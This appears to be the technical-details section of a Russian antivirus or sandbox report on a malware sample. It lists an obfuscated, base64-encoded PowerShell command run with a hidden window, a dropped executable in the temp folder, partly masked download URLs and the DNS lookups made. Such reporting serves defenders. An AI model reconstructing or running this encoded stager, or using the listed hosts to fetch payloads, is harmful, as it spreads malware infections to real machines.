Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACgAZwB2ACAAJwAqAE0ARAByACoAJwApAC4ATgBhAE0ARQBbADMALAAxADEALAAyAF0ALQBKAG8AaQBOACcAJwApACAAKAAiACAAJAAoAFMAZQB0AC0AaQB0AGUAbQAgACAAJwBWAEEAcgBpAEEAQgBsAEUAOgBvAGYAcwAnACAAIAAnACcAKQAiAC...
- %TEMP%\26145.exe
- %TEMP%\26145.exe
- 'ny##rd.no':80
- 'tr###stop.no':443
- 'ne###edia.com':80
- 'na##all.com':80
- 'de###media.it':80
- http://ny##rd.no/Gj/
- http://ne###edia.com/BGpE/
- http://na##all.com/D/
- http://de###media.it/VtbqUtggu/
- 'tr###stop.no':443
- DNS ASK ny##rd.no
- DNS ASK tr###stop.no
- DNS ASK ni###lab.com
- DNS ASK ne###edia.com
- DNS ASK na##all.com
- DNS ASK de###media.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACgAZwB2ACAAJwAqAE0ARAByACoAJwApAC4ATgBhAE0ARQBbADMALAAxADEALAAyAF0ALQBKAG8AaQBOACcAJwApACAAKAAiACAAJAAoAFMAZQB0AC0AaQB0AGUAbQAgACAAJwBWAEEAcgBpAEEAQgBsAEUAOgBvAGYAcwAnACAAIAAnACcAKQAiAC...' (со скрытым окном)